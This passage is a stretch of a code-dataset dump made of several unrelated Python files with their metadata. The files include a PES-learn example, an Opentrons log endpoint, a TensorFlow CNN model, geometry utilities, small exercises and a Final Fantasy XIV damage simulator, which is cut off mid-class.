'regex'\n use_pips = true\n energy_regex = 'Total Energy\\s+=\\s+(-\\d+\\.\\d+)'\n hp_maxit = 15\n training_points = 50\n sampling = structure_based\n \"\"\")\n\ninput_obj = peslearn.InputProcessor(input_string)\ntemplate_obj = peslearn.datagen.Template(\"./template.dat\")\nmol = peslearn.datagen.Molecule(input_obj.zmat_string)\nconfig = peslearn.datagen.ConfigurationSpace(mol, input_obj)\nconfig.generate_PES(template_obj)\n\n# run single point energies with Psi4\nimport os\nos.chdir(\"PES_data\")\ndirs = [i for i in os.listdir(\".\") if os.path.isdir(i) ]\nfor d in dirs:\n os.chdir(d)\n if \"output.dat\" not in os.listdir('.'):\n print(d, end=', ')\n os.system(\"psi4 input.dat\")\n os.chdir(\"../\")\nos.chdir(\"../\")\n\nprint('\\nParsing ab initio data...')\npeslearn.utils.parsing_helper.parse(input_obj, mol)\n\nprint('\\nBeginning GP optimization...')\ngp = peslearn.ml.gaussian_process.GaussianProcess(\"PES.dat\", input_obj, 'A2B')\ngp.optimize_model()\n","sub_path":"Examples/1_water_api_example/gaussian_process/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"335973530","text":"import json\nimport logging\n\nfrom typing import Any, Dict, Mapping\n\nfrom aiohttp import web\n\nfrom opentrons.system import log_control\n\nLOG = logging.getLogger(__name__)\n\n\ndef _get_options(params: Mapping[str, str],\n default_length: int) -> Dict[str, Any]:\n \"\"\" Parse options from a request. Should leave the request able to\n be read again since it only uses the content-preserving\n :py:meth:`aiohttp.web.Request.json`. Will not fail; malformed\n requests will just use defaults.\n \"\"\"\n response = {\n 'format': 'text',\n 'records': default_length\n }\n\n print({k: v for k, v in params.items()})\n\n if 'format' in params:\n if params['format'] not in ('text', 'json'):\n LOG.error(f\"Bad log format requested: {params['format']}\")\n else:\n response['format'] = params['format']\n\n if 'records' in params:\n try:\n records = int(params['records'])\n if records <= 0 or records > log_control.MAX_RECORDS:\n raise ValueError(records)\n except (ValueError, TypeError):\n LOG.exception(f\"Bad records count requested: {params['records']}\")\n else:\n response['records'] = records\n return response\n\n\nasync def _get_log_response(syslog_selector: str, record_count: int,\n record_format: str) -> web.Response:\n modes = {\n 'json': 'json',\n 'text': 'short'\n }\n output = await log_control.get_records_dumb(syslog_selector,\n record_count,\n modes[record_format])\n return web.Response(text=output.decode('utf-8'))\n\n\nasync def get_logs_by_id(request: web.Request) -> web.Response:\n \"\"\" Get logs from the robot.\n\n GET /logs/:syslog_identifier -> 200 OK, log contents in body\n\n This endpoint accepts the following (optional) query parameters:\n - ``format``: ``json`` or ``text`` (default: text). Controls log format.\n - ``records``: int. Count of records to limit the dump to. Default: 500000.\n Limit: 1000000\n\n The syslog identifier is an a string that something has logged to as the\n syslog id. It may not be blank (i.e. GET /logs/ is not allowed). The\n identifier is sent to systemd and therefore invalid syslog ids will result\n in an empty response body, not a 404.\n\n In addition to actual syslog identifiers, for backwards compatibility the\n path can be ``serial.log``, which corresponds to syslog id\n ``opentrons-api-serial`` or ``api.log``, which corresponds to syslog id\n ``opentrons-api``.\n\n For instance, ``GET /logs/api.log?format=json`` gives the API logs in json\n format.\n \"\"\"\n ident = request.match_info['syslog_identifier']\n if ident == 'api.log':\n ident = 'opentrons-api'\n elif ident == 'serial.log':\n ident = 'opentrons-api-serial'\n opts = _get_options(request.query, 500000)\n return await _get_log_response(\n ident, opts['records'], opts['format'])\n\n\nasync def set_syslog_level(request: web.Request) -> web.Response:\n \"\"\"\n Set the minimum level for which logs will be sent upstream via syslog-ng\n\n POST /settings/log_level/upstream {\"log_level\": str level, null} -> 200 OK\n\n \"\"\"\n try:\n body = await request.json()\n except json.JSONDecodeError:\n return web.json_response(status=400,\n data={\"message\": \"request must be json\"})\n if 'log_level' not in body:\n return web.json_response(\n status=400,\n data={\"message\": \"body must have log_level key\"})\n log_level = body['log_level']\n ok_syslogs = {\n 'error': 'err',\n 'warning': 'warning',\n 'info': 'info',\n 'debug': 'debug'\n }\n if log_level is None:\n syslog_level = 'emerg'\n else:\n try:\n syslog_level = ok_syslogs[log_level.lower()]\n except (KeyError, AttributeError):\n return web.json_response(\n status=400,\n data={\"message\": f\"invalid log level {log_level}\"})\n\n code, stdout, stderr = await log_control.set_syslog_level(syslog_level)\n if code != 0:\n msg = f'Could not reload config: {stdout} {stderr}'\n LOG.error(msg)\n return web.json_response(status=500, data={'message': msg})\n else:\n\n if log_level:\n result = f'Upstreaming log level changed to {log_level}'\n getattr(LOG, log_level.lower())(\n result)\n else:\n result = \"Upstreaming logs disabled\"\n LOG.info(result)\n return web.json_response(status=200,\n data={\"message\": result})\n","sub_path":"api/src/opentrons/server/endpoints/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"339021520","text":"# -*- coding: utf8 -*-\n\nimport string\nfrom puppy.result import ResultFilter\n\n\nclass DuplicateFilter(ResultFilter):\n \"\"\"\n Filters search results and rejects ones already stored by an application. This is done by default by checking the link field\n of new results against a list of ones currently stored by the application. If found, they are rejected.\n\n Options:\n \n * order (int): defines when, in the pipeline, this filter will be executed\n\n * existing results (list of str): urls already stored in the application - we want to avoid getting these again.\n\n \"\"\"\n \n def __init__(self, order=0, existingResults=[]):\n \"\"\"Constructor for DuplicateFilter.\"\"\"\n\n super(DuplicateFilter, self).__init__(order)\n self.info = \"Filters search results and removes ones already stored by the application using this filter (link field used for this check).\"\n self.existingResults = existingResults\n \n def filter(self, results): \n \"\"\"\n Filters search results and rejects ones already stored by the application using this filter (link field used for this check).\n\n Parameters:\n\n * results (puppy.model.Opensearch.Response): results to be filtered\n\n Returns:\n\n * results_returned (puppy.model.Opensearch.Response): filtered results\n \"\"\"\n\n # Go through each result and check it's already in the system\n for result in results:\n found = False\n for url in self.existingResults:\n if (result['link'] == url):\n found = True\n break\n\n if (found == False):\n yield result\n else:\n print('Rejected result as already stored')\n \n","sub_path":"reference-code/puppy/result/filter/duplicatefilter.py","file_name":"duplicatefilter.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"130872474","text":"import json\nfrom shapely.geometry import Point, Polygon\nimport matplotlib.patches as mpatch\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom matplotlib.collections import PatchCollection\nimport numpy as np\n\n\ndef showAreaImage(Image, polygons):\n \"\"\"\n Visualize key areas with image background\n :param Image: background image path\n :param polygons: polygons list: [[vertex points coordinate], [vertex points coordinate], ...]\n :return:\n \"\"\"\n patches = []\n fig, ax = plt.subplots()\n plt.imshow(mpimg.imread(Image))\n colors = ['blue', 'red', 'green', 'aqua', 'yello', 'white', 'black']\n for i in range(len(polygons)):\n polygon = polygons[i]\n poly = mpatch.Polygon(np.array(polygon), True)\n patches.append(poly)\n p = PatchCollection(patches, alpha=0.3)\n p.set_color(colors[:len(polygons)])\n ax.add_collection(p)\n plt.show()\n\n\ndef readFile(file_path):\n with open(file_path) as f:\n d = json.load(f)\n total_frame = len(d)\n return d, total_frame\n\n\ndef pointInPolygon(uv, polygon):\n \"\"\"\n Whether points in the polygon\n :param uv: List, image coordinate\n :param polygon: List, [vertex points coordinate]\n :return: Boolean, whether points in the polygon\n \"\"\"\n p = Point(uv[0], uv[1])\n poly = Polygon(polygon)\n return p.within(poly)\n\n\ndef polygonIntersction(p1, p2):\n P1 = Polygon(p1)\n P2 = Polygon(p2)\n u, v = P1.intersection(P2).exterior.coords.xy\n v_list = []\n\n for i in range(len(u)):\n v_list.append([u[i], v[i]])\n\n return v_list\n\ndef polygonNonIntersect(p1, p2):\n P1 = Polygon(p1)\n P2 = Polygon(p2)\n\n # create a new polygon that is essentially P1 minus the intersection\n nonoverlap = (P1.symmetric_difference(P2)).difference(P2)\n u,v = nonoverlap.exterior.coords.xy\n\n v_list = []\n\n for i in range(len(u)):\n v_list.append([u[i], v[i]])\n\n return v_list","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"143344230","text":"class Zoo:\n __animals = 0\n\n def __init__(self, zoo_name):\n self.zoo_name = zoo_name\n self.mammals = []\n self.fishes = []\n self.birds = []\n\n def add_animal(self, species, name):\n if species == \"mammal\":\n self.mammals.append(name)\n elif species == \"fish\":\n self.fishes.append(name)\n elif species == \"bird\":\n self.birds.append(name)\n Zoo.__animals += 1\n\n def get_info(self, species):\n result = \"\"\n if species == \"mammal\":\n result += f\"Mammals in {self.zoo_name}: {', '.join(self.mammals)}\\n\"\n elif species == \"fish\":\n result += f\"Fishes in {self.zoo_name}: {', '.join(self.fishes)}\\n\"\n elif species == \"bird\":\n result += f\"Birds in {self.zoo_name}: {', '.join(self.birds)}\\n\"\n\n result += f\"Total animals: {Zoo.__animals}\"\n return result\n\n\nzoo_name = input()\nzoo = Zoo(zoo_name)\nnumber_of_animals = int(input())\nfor animals in range(number_of_animals):\n animals, specie = input().split()\n zoo.add_animal(animals, specie)\n\nspecies = input()\n\nprint(zoo.get_info(species))","sub_path":"classes_and_objects_lab/zoo.py","file_name":"zoo.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"151642116","text":"# -*- coding: utf-8 -*-\n# app.py\n\nimport responder\nimport datetime\n\napi = responder.API()\n\n@api.route(\"/now\")\nasync def now(req, resp):\n dt_now = datetime.datetime.now()\n resp.text= dt_now.isoformat()\n\nif __name__ == '__main__':\n api.run()\n\n","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"42920483","text":"#!/usr/bin/python\n\nfrom oss.oss_api import OssAPI\n\ndef get_oss_api():\n try:\n oss = OssAPI(host='host', \n access_id=\"accessid\", \n secret_access_key='secret_key')\n except:\n return None\n return oss\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41965815","text":"from model import Model\nimport tensorflow as tf\n\nclass ModelAllConvMod(Model):\n def __init__(self, activation_func):\n super(ModelAllConvMod, self).__init__(\"allconvmod\", activation_func)\n with tf.device(\"/gpu:0\"):\n self.input = tf.placeholder(tf.float32, shape=[None,32,32,3])\n self.labels = tf.placeholder(tf.float32, shape=[None,10])\n self.dropout = tf.placeholder(tf.float32)\n\n # 3x3 layer 1\n W_conv1 = self.__weights([3,3,3,96])\n b_conv1 = self.__biases([96])\n h_conv1 = self.act_fn(tf.nn.conv2d(self.input, W_conv1, strides=[1,1,1,1], padding=\"SAME\") + b_conv1)\n\n # 3x3 layer 2\n W_conv2 = self.__weights([3,3,96,96])\n b_conv2 = self.__biases([96])\n h_conv2 = self.act_fn(tf.nn.conv2d(h_conv1, W_conv2, strides=[1,1,1,1], padding=\"SAME\") + b_conv2)\n\n # 3x3 downsample layer 3\n W_downsample3 = self.__weights([3,3,96,96])\n b_downsample3 = self.__biases([96])\n h_downsample3 = self.act_fn(tf.nn.conv2d(h_conv2, W_downsample3, strides=[1,2,2,1], padding=\"SAME\") + b_downsample3)\n\n # 3x3 layer 4\n W_conv4 = self.__weights([3,3,96,192])\n b_conv4 = self.__biases([192])\n h_conv4 = self.act_fn(tf.nn.conv2d(h_downsample3, W_conv4, strides=[1,1,1,1], padding=\"SAME\") + b_conv4)\n\n # 3x3 layer 5\n W_conv5 = self.__weights([3,3,192,192])\n b_conv5 = self.__biases([192])\n h_conv5 = self.act_fn(tf.nn.conv2d(h_conv4, W_conv5, strides=[1,1,1,1], padding=\"SAME\") + b_conv5)\n\n # 3x3 downsample layer 6\n W_downsample6 = self.__weights([3,3,192,192])\n b_downsample6 = self.__biases([192])\n h_downsample6 = self.act_fn(tf.nn.conv2d(h_conv5, W_downsample6, strides=[1,2,2,1], padding=\"SAME\") + b_downsample6)\n\n W_fc1 = self.__weights([8*8*192, 1024])\n b_fc1 = self.__biases([1024])\n h_conv_r3_flat = tf.reshape(h_downsample6, [-1, 8*8*192])\n h_fc1 = self.act_fn(tf.nn.xw_plus_b(h_conv_r3_flat, W_fc1, b_fc1))\n\n W_fc2 = self.__weights([1024, 512])\n b_fc2 = self.__biases([512])\n h_fc2 = self.act_fn(tf.nn.xw_plus_b(h_fc1, W_fc2, b_fc2))\n\n h_fc2_dropout = tf.nn.dropout(h_fc2, self.dropout)\n\n W_fc3 = self.__weights([512, 10])\n b_fc3 = self.__biases([10])\n self.raw_scores = tf.nn.xw_plus_b(h_fc2_dropout, W_fc3, b_fc3)\n self.probabilities = tf.nn.softmax(self.raw_scores)\n self.prediction = tf.argmax(self.probabilities, 1)\n\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(self.raw_scores, self.labels))\n self.train = tf.train.AdamOptimizer(1e-4).minimize(loss)\n\n self.accuracy = tf.reduce_mean(tf.cast(tf.equal(self.prediction, tf.argmax(self.labels, 1)), tf.float32))\n\n def train_model(self, session, images, labels):\n session.run(self.train, feed_dict={self.input: images, self.labels: labels, self.dropout: 0.75})\n\n def predict(self, session, images):\n return session.run(self.prediction, feed_dict={self.input: images, self.dropout: 1.0})\n\n def get_accuracy(self, session, images, labels):\n return session.run(self.accuracy, feed_dict={self.input: images, self.labels: labels, self.dropout: 1.0})\n\n def __weights(self, shape):\n return tf.Variable(tf.truncated_normal(shape, stddev=0.1))\n\n def __biases(self, shape):\n return tf.Variable(tf.constant(0.1, shape=shape))\n","sub_path":"model_allconv_mod.py","file_name":"model_allconv_mod.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"610705567","text":"from abc import ABCMeta, abstractmethod\nfrom datetime import datetime, timedelta\nfrom math import ceil, floor\nfrom typing import List, Tuple\n\nimport numpy\n\nfrom simfantasy.common_math import divisor_per_level, get_base_stats_by_job, \\\n main_stat_per_level, sub_stat_per_level\nfrom simfantasy.enums import Attribute, Job, RefreshBehavior, Resource, Slot\nfrom simfantasy.simulator import Actor, Aura, Simulation, TickingAura\n\n\nclass Event(metaclass=ABCMeta):\n \"\"\"Emitted objects corresponding to in-game occurrences.\"\"\"\n\n def __init__(self, sim: Simulation):\n \"\"\"\n Create a new event.\n\n :param sim: The simulation that the event is fired within.\n \"\"\"\n self.sim = sim\n\n self.timestamp: datetime = None\n self.unscheduled = False\n\n def __lt__(self, other: 'Event') -> bool:\n \"\"\"\n Comparison for determining if one Event is less than another. Required for sorting the event heap. Returns\n\n :param other: The other event to compare to.\n :return: True if current event occurs before other.\n \"\"\"\n return self.timestamp < other.timestamp\n\n def __str__(self) -> str:\n \"\"\"String representation of the object.\"\"\"\n return '<{cls}>'.format(cls=self.__class__.__name__)\n\n @abstractmethod\n def execute(self) -> None:\n \"\"\"Handle the event appropriately when popped off the heap queue.\"\"\"\n\n\nclass CombatStartEvent(Event):\n def __init__(self, sim: Simulation):\n super().__init__(sim)\n\n self.sim.current_time = self.sim.start_time = datetime.now()\n\n def execute(self) -> None:\n for actor in self.sim.actors:\n self.sim.logger.debug('[%s] ^^ %s %s arises', self.sim.current_iteration, self.sim.relative_timestamp,\n actor)\n actor.arise()\n\n\nclass CombatEndEvent(Event):\n \"\"\"An event indicating that combat has ceased.\"\"\"\n\n def execute(self) -> None:\n \"\"\"Clear any remaining events in the heap.\"\"\"\n self.sim.events.clear()\n\n\nclass AuraEvent(Event, metaclass=ABCMeta):\n \"\"\"\n An event that deals with an \"aura\", i.e., a buff or debuff that can be applied to an\n :class:`~simfantasy.simulator.Actor`.\n \"\"\"\n\n def __init__(self, sim: Simulation, target: Actor, aura: Aura):\n \"\"\"\n Create a new event.\n\n :param sim: The simulation that the event is fired within.\n :param target: The :class:`~simfantasy.simulator.Actor` context in which to evaluate the aura.\n :param aura: The aura that will interact with the target.\n \"\"\"\n super().__init__(sim)\n\n self.target = target\n self.aura = aura\n\n def __str__(self) -> str:\n \"\"\"String representation of the object.\"\"\"\n return '<{cls} aura={aura} target={target}>'.format(\n cls=self.__class__.__name__,\n aura=self.aura.name,\n target=self.target.name\n )\n\n\nclass ApplyAuraEvent(AuraEvent):\n \"\"\"An event indicating that an aura should be added to an :class:`~simfantasy.simulator.Actor`.\"\"\"\n\n def execute(self) -> None:\n \"\"\"Add the aura to the target and fire any post-application hooks from the aura itself.\"\"\"\n self.aura.apply(self.target)\n\n self.target.statistics['auras'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'target': self.target.name,\n 'aura': self.aura.name,\n 'application': True,\n })\n\n\nclass ExpireAuraEvent(AuraEvent):\n \"\"\"An event indicating that an aura should be removed from an :class:`~simfantasy.simulator.Actor`.\"\"\"\n\n def execute(self) -> None:\n \"\"\"Remove the aura if still present on the target and fire any post-expiration hooks from the aura itself.\"\"\"\n self.aura.expire(self.target)\n self.aura.expiration_event = None\n\n self.target.statistics['auras'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'target': self.target.name,\n 'aura': self.aura.name,\n 'expiration': True,\n })\n\n\nclass ActorReadyEvent(Event):\n \"\"\"An event indicating that an :class:`~simfantasy.simulator.Actor` is ready to perform new actions.\"\"\"\n\n def __init__(self, sim: Simulation, actor: Actor):\n \"\"\"\n Create a new event.\n\n :param sim: The simulation that the event is fired within.\n :param actor: The :class:`~simfantasy.simulator.Actor` context, i.e, the one recovering from nonready state.\n \"\"\"\n super().__init__(sim)\n\n self.actor = actor\n\n def execute(self) -> None:\n decision_engine = self.actor.decide()\n\n for decision in decision_engine:\n if decision is not None:\n try:\n decision.perform()\n break\n except FailedActionAttemptError as e:\n if self.sim.log_action_attempts:\n self.sim.logger.warning('[%s] %s %s',\n self.sim.current_iteration, self.sim.relative_timestamp, e)\n\n continue\n else:\n break\n\n def __str__(self):\n \"\"\"String representation of the object.\"\"\"\n return '<{cls} actor={actor}>'.format(\n cls=self.__class__.__name__,\n actor=self.actor.name\n )\n\n\nclass RefreshAuraEvent(AuraEvent):\n def __init__(self, sim: Simulation, target: Actor, aura: Aura):\n super().__init__(sim, target, aura)\n\n self.remains = self.aura.expiration_event.timestamp - self.sim.current_time\n\n def execute(self) -> None:\n if self.aura.refresh_behavior is RefreshBehavior.RESET:\n delta = self.aura.duration\n elif self.aura.refresh_behavior is RefreshBehavior.EXTEND_TO_MAX:\n delta = max(self.aura.duration,\n self.sim.current_time - self.aura.expiration_event + self.aura.refresh_extension)\n else:\n delta = self.aura.duration\n\n self.aura.expire(self.target)\n self.aura.apply(self.target)\n\n self.sim.unschedule(self.aura.expiration_event)\n self.aura.expiration_event = ExpireAuraEvent(self.sim, self.target, self.aura)\n self.sim.schedule(self.aura.expiration_event, delta)\n\n self.target.statistics['auras'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'target': self.target.name,\n 'aura': self.aura.name,\n 'refresh': True,\n })\n\n def __str__(self) -> str:\n return '<{cls} aura={aura} target={target} behavior={behavior} remains={remains}>'.format(\n cls=self.__class__.__name__,\n aura=self.aura.name,\n target=self.target.name,\n behavior=self.aura.refresh_behavior,\n remains=format(self.remains.total_seconds(), '.3f')\n )\n\n\nclass ConsumeAuraEvent(AuraEvent):\n def __init__(self, sim: Simulation, target: Actor, aura: Aura):\n super().__init__(sim, target, aura)\n\n self.remains = self.aura.expiration_event.timestamp - self.sim.current_time\n\n def execute(self) -> None:\n self.aura.expire(self.target)\n self.sim.unschedule(self.aura.expiration_event)\n self.aura.expiration_event = None\n\n self.target.statistics['auras'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'target': self.target.name,\n 'aura': self.aura.name,\n 'consumption': True,\n })\n\n\nclass DamageEvent(Event):\n def __init__(self, sim: Simulation, source: Actor, target: Actor, action: 'Action', potency: int,\n trait_multipliers: List[float] = None, buff_multipliers: List[float] = None,\n guarantee_crit: bool = None):\n super().__init__(sim)\n\n if trait_multipliers is None:\n trait_multipliers = []\n\n if buff_multipliers is None:\n buff_multipliers = []\n\n self.source = source\n self.target = target\n self.action = action\n self.potency = potency\n self.trait_multipliers = trait_multipliers\n self.buff_multipliers = buff_multipliers\n\n self._damage = None\n\n self._is_critical_hit = guarantee_crit\n \"\"\"\n Deferred attribute. Set once unless cached value is invalidated. True if the ability was determined to be a\n critical hit.\n \"\"\"\n\n self._is_direct_hit = None\n \"\"\"\n Deferred attribute. Set once unless cached value is invalidated. True if the ability was determined to be a\n direct hit.\n \"\"\"\n\n def execute(self):\n self.source.statistics['damage'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'source': self.source.name,\n 'target': self.target.name,\n 'action': self.action.name,\n 'damage': self.damage,\n 'critical': self.is_critical_hit,\n 'direct': self.is_direct_hit\n })\n\n @property\n def critical_hit_chance(self) -> float:\n \"\"\"\n Calculate the critical hit probability.\n\n :return: A float in the range [0, 1].\n \"\"\"\n sub_stat = sub_stat_per_level[self.source.level]\n divisor = divisor_per_level[self.source.level]\n p_chr = floor(200 * (self.source.stats[Attribute.CRITICAL_HIT] - sub_stat) / divisor + 50) / 1000\n\n return p_chr\n\n @property\n def is_critical_hit(self) -> bool:\n \"\"\"\n Check for a cached value and set if being evaluated for the first time.\n\n :return: True if the ability is a critical hit.\n \"\"\"\n if self._is_critical_hit is None:\n if self.critical_hit_chance >= 100:\n self._is_critical_hit = True\n elif self.critical_hit_chance <= 0:\n self._is_critical_hit = False\n else:\n self._is_critical_hit = numpy.random.uniform() <= self.critical_hit_chance\n\n return self._is_critical_hit\n\n @property\n def direct_hit_chance(self):\n \"\"\"\n Calculate the direct hit probability.\n\n :return: A float in the range [0, 1].\n \"\"\"\n sub_stat = sub_stat_per_level[self.source.level]\n divisor = divisor_per_level[self.source.level]\n p_dhr = floor(550 * (self.source.stats[Attribute.DIRECT_HIT] - sub_stat) / divisor) / 1000\n\n return p_dhr\n\n @property\n def is_direct_hit(self):\n \"\"\"\n Check for a cached value and set if being evaluated for the first time.\n\n :return: True if the ability is a direct hit.\n \"\"\"\n if self._is_direct_hit is None:\n if self.direct_hit_chance >= 100:\n self._is_direct_hit = True\n elif self.direct_hit_chance <= 0:\n self._is_direct_hit = False\n else:\n self._is_direct_hit = numpy.random.uniform() <= self.direct_hit_chance\n\n return self._is_direct_hit\n\n @property\n def damage(self) -> int:\n \"\"\"\n Calculate the damage dealt directly to the target by the ability. Accounts for criticals, directs, and\n randomization.\n\n :return: The damage inflicted as an integer value.\n \"\"\"\n if self._damage is not None:\n return self._damage\n\n base_stats = get_base_stats_by_job(self.source.job)\n\n if self.action.powered_by is Attribute.ATTACK_POWER:\n if self.source.job in [Job.BARD, Job.MACHINIST, Job.NINJA]:\n job_attribute_modifier = base_stats[Attribute.DEXTERITY]\n attack_rating = self.source.stats[Attribute.DEXTERITY]\n else:\n job_attribute_modifier = base_stats[Attribute.STRENGTH]\n attack_rating = self.source.stats[Attribute.STRENGTH]\n\n weapon_damage = self.source.gear[Slot.WEAPON].physical_damage\n elif self.action.powered_by is Attribute.ATTACK_MAGIC_POTENCY:\n if self.source.job in [Job.ASTROLOGIAN, Job.SCHOLAR, Job.WHITE_MAGE]:\n job_attribute_modifier = base_stats[Attribute.MIND]\n attack_rating = self.source.stats[Attribute.MIND]\n else:\n job_attribute_modifier = base_stats[Attribute.INTELLIGENCE]\n attack_rating = self.source.stats[Attribute.INTELLIGENCE]\n\n weapon_damage = self.source.gear[Slot.WEAPON].magic_damage\n elif self.action.powered_by is Attribute.HEALING_MAGIC_POTENCY:\n job_attribute_modifier = base_stats[Attribute.MIND]\n weapon_damage = self.source.gear[Slot.WEAPON].magic_damage\n attack_rating = self.source.stats[Attribute.MIND]\n else:\n raise Exception('Action affected by unexpected attribute.')\n\n main_stat = main_stat_per_level[self.source.level]\n sub_stat = sub_stat_per_level[self.source.level]\n divisor = divisor_per_level[self.source.level]\n\n f_ptc = self.potency / 100\n f_wd = floor((main_stat * job_attribute_modifier / 1000) + weapon_damage)\n f_atk = floor((125 * (attack_rating - 292) / 292) + 100) / 100\n f_det = floor(130 * (self.source.stats[Attribute.DETERMINATION] - main_stat) / divisor + 1000) / 1000\n f_tnc = floor(100 * (self.source.stats[Attribute.TENACITY] - sub_stat) / divisor + 1000) / 1000\n f_chr = floor(200 * (self.source.stats[Attribute.CRITICAL_HIT] - sub_stat) / divisor + 1400) / 1000\n\n damage_randomization = numpy.random.uniform(0.95, 1.05)\n\n damage = f_ptc * f_wd * f_atk * f_det * f_tnc\n\n for m in self.trait_multipliers:\n damage *= m\n\n damage = floor(damage)\n damage = floor(damage * (f_chr if self.is_critical_hit else 1))\n damage = floor(damage * (1.25 if self.is_direct_hit else 1))\n damage = floor(damage * damage_randomization)\n\n for m in self.buff_multipliers:\n damage = floor(damage * m)\n\n self._damage = int(damage)\n\n return self._damage\n\n def __str__(self) -> str:\n \"\"\"String representation of the object.\"\"\"\n return '<{cls} source={source} target={target} action={action} crit={crit} direct={direct} damage={damage} traits={traits} buffs={buffs}>'.format(\n cls=self.__class__.__name__,\n source=self.source.name,\n target=self.target.name,\n action=self.action.name,\n crit=self.is_critical_hit,\n direct=self.is_direct_hit,\n damage=self.damage,\n traits=self.trait_multipliers,\n buffs=self.buff_multipliers,\n )\n\n\nclass DotTickEvent(DamageEvent):\n def __init__(self, sim: Simulation, source: Actor, target: Actor, action: 'Action', potency: int, aura: TickingAura,\n ticks_remain: int = None, trait_multipliers: List[float] = None, buff_multipliers: List[float] = None):\n super().__init__(sim, source, target, action, potency, trait_multipliers, buff_multipliers)\n\n self.aura = aura\n self.action = action\n\n if ticks_remain is None:\n ticks_remain = self.aura.ticks\n\n self.ticks_remain = ticks_remain\n\n def execute(self) -> None:\n self.source.statistics['damage'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'source': self.source.name,\n 'target': self.target.name,\n 'action': self.action.name,\n 'damage': self.damage,\n 'critical': self.is_critical_hit,\n 'direct': self.is_direct_hit,\n 'dot': True,\n })\n\n if self.ticks_remain > 0:\n tick_event = self.create_tick_event(self.sim, self.source, self.target, self.action, self.potency,\n self.aura, self.ticks_remain - 1, self.trait_multipliers,\n self.buff_multipliers)\n\n self.aura.tick_event = tick_event\n self.sim.schedule(tick_event, timedelta(seconds=3))\n\n @classmethod\n def create_tick_event(cls, *args, **kwargs):\n return cls(*args, **kwargs)\n\n @property\n def damage(self) -> int:\n if self._damage is not None:\n return self._damage\n\n base_stats = get_base_stats_by_job(self.source.job)\n\n if self.action.powered_by is Attribute.ATTACK_POWER:\n if self.source.job in [Job.BARD, Job.MACHINIST, Job.NINJA]:\n job_attribute_modifier = base_stats[Attribute.DEXTERITY]\n attack_rating = self.source.stats[Attribute.DEXTERITY]\n else:\n job_attribute_modifier = base_stats[Attribute.STRENGTH]\n attack_rating = self.source.stats[Attribute.STRENGTH]\n\n weapon_damage = self.source.gear[Slot.WEAPON].physical_damage\n elif self.action.powered_by is Attribute.ATTACK_MAGIC_POTENCY:\n if self.source.job in [Job.ASTROLOGIAN, Job.SCHOLAR, Job.WHITE_MAGE]:\n job_attribute_modifier = base_stats[Attribute.MIND]\n attack_rating = self.source.stats[Attribute.MIND]\n else:\n job_attribute_modifier = base_stats[Attribute.INTELLIGENCE]\n attack_rating = self.source.stats[Attribute.INTELLIGENCE]\n\n weapon_damage = self.source.gear[Slot.WEAPON].magic_damage\n elif self.action.powered_by is Attribute.HEALING_MAGIC_POTENCY:\n job_attribute_modifier = base_stats[Attribute.MIND]\n weapon_damage = self.source.gear[Slot.WEAPON].magic_damage\n attack_rating = self.source.stats[Attribute.MIND]\n else:\n raise Exception('Action affected by unexpected attribute.')\n\n main_stat = main_stat_per_level[self.source.level]\n sub_stat = sub_stat_per_level[self.source.level]\n divisor = divisor_per_level[self.source.level]\n\n f_ptc = self.potency / 100\n f_wd = floor((main_stat * job_attribute_modifier / 1000) + weapon_damage)\n f_atk = floor((125 * (attack_rating - 292) / 292) + 100) / 100\n f_det = floor(130 * (self.source.stats[Attribute.DETERMINATION] - main_stat) / divisor + 1000) / 1000\n f_tnc = floor(100 * (self.source.stats[Attribute.TENACITY] - sub_stat) / divisor + 1000) / 1000\n f_ss = floor(130 * (self.source.stats[self.action.hastened_by] - sub_stat) / divisor + 1000) / 1000\n f_chr = floor(200 * (self.source.stats[Attribute.CRITICAL_HIT] - sub_stat) / divisor + 1400) / 1000\n\n damage_randomization = numpy.random.uniform(0.95, 1.05)\n\n damage = f_ptc * f_wd * f_atk * f_det * f_tnc\n\n for m in self.trait_multipliers:\n damage *= m\n\n damage = floor(damage)\n damage = floor(damage * f_ss)\n damage = floor(damage * (f_chr if self.is_critical_hit else 1))\n damage = floor(damage * (1.25 if self.is_direct_hit else 1))\n damage = floor(damage * damage_randomization)\n\n for m in self.buff_multipliers:\n damage = floor(damage * m)\n\n self._damage = int(damage)\n\n return self._damage\n\n def __str__(self):\n return '<{cls} source={source} target={target} action={action} crit={crit} direct={direct} damage={damage} ticks_remain={ticks_remain}>'.format(\n cls=self.__class__.__name__,\n source=self.source.name,\n target=self.target.name,\n action=self.action.name,\n crit=self.is_critical_hit,\n direct=self.is_direct_hit,\n damage=self.damage,\n ticks_remain=self.ticks_remain,\n )\n\n\nclass Action:\n animation = timedelta(seconds=0.75)\n base_cast_time: timedelta = timedelta()\n base_recast_time: 